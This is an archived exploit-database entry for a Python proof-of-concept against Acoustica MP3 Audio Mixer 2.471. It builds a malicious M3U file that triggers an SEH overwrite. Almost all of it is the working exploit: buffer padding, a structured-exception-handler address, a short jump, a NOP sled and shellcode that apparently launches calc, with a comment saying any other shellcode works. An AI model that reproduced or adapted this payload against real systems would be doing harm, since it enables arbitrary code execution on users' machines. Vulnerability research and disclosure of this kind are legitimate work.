Acoustica MP3 Audio Mixer 2.471 SEH Overwrite

2010-09-11T00:00:00
ID PACKETSTORM:93736
Type packetstorm
Reporter Carlos Hollmann
Modified 2010-09-11T00:00:00

Description

                                        
                                            `# Exploit Title: Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH  
# Date: September 8 2010  
# Author: Carlos Hollmann  
# Software Link: http://www.acoustica.com/downloading.asp?p=1  
# Version: 2.471  
# Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8  
# CVE :  
  
  
# ________ _ _________ ____ __ _____ ________  
# / ____/ / | | / / ____/ | / / //_// _/ | / / ____/  
# / __/ / / | | / / __/ / |/ / ,< / // |/ / / __   
# / /___/ /___| |/ / /___/ /| / /| |_/ // /| / /_/ /   
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/   
  
# COLOMBIA presents.............  
# PoC from D3V!L FucK3r http://www.exploit-db.com/exploits/9213/  
#  
# Carlos Mario Penagos Hollmann A.K.A Elvenking shogilord@gmail.com  
# Extended M3U directives  
  
# Background from http://hanna.pyxidis.org/tech/m3u.html  
  
  
  
# The software doesn't handle correctly M3U's header and extra info when is being imported on a open sound group.  
# Trigger: launch app, open an existing sound group i.e(C:\Program Files\Acoustica MP3 Audio Mixer\example.sgp) then import the crash.m3u and....KaaaaBooom!!  
#  
#   
# Greetings: My Family, Algeria-->sud0 Australia--> tecr0c,Peru-->fataku,Spain-->Alberto Hervalejo, OFFSEC TEAM and all my friends in Colombia  
# !!! PAZ PARA MI PAIS PAZ PARA COLOMBIA !!! Freedom!!  
  
  
  
  
# Script provided 'as is', without any warranty.  
# Use for educational purposes only.  
# Do not use this code to do anything illegal !  
# I do not want anyone to use this script  
# for malicious and/or illegal purposes  
# I cannot be held responsible for any illegal use.  
  
# Note : you are not allowed to edit/modify this code.  
# If you do, I will not be held responsible for any damages this may cause.  
  
#!/usr/bin/python  
  
  
magic = "crash.m3u"  
  
  
vuln = "\x23\x0D\x0A\x23\x0D\x0A" # Extended M3U, no EXTM3U, no EXTINFO , can change OD for any value \x1b,\x0a.........  
  
  
junk = "\x41" * 816  
ds_eax = "\x25\x25\x47\x7E" #First Call ds:[eax+8], Writeable memory address to put in EAX  
morejunk = "\x42" * 8308  
nSEH = "\xEB\x06\x90\x90" #short jmp 6 bytes  
SEH = "\x3F\x28\xD1\x72"#SEH Handler  
nops = "\x90" * 10 #landing padd  
shellcode = "\x8b\xec\x55\x8b\xec\x68\x20\x20\x20\x2f\x68\x63\x61\x6c\x63\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0" # Thanks sud0, any other shell works too just remove "\x00\x0a"  
payload = vuln+junk+ds_eax+morejunk+nSEH+SEH+nops+shellcode  
  
file = open(magic , 'w')  
file.write(payload)  
file.close()  
  
`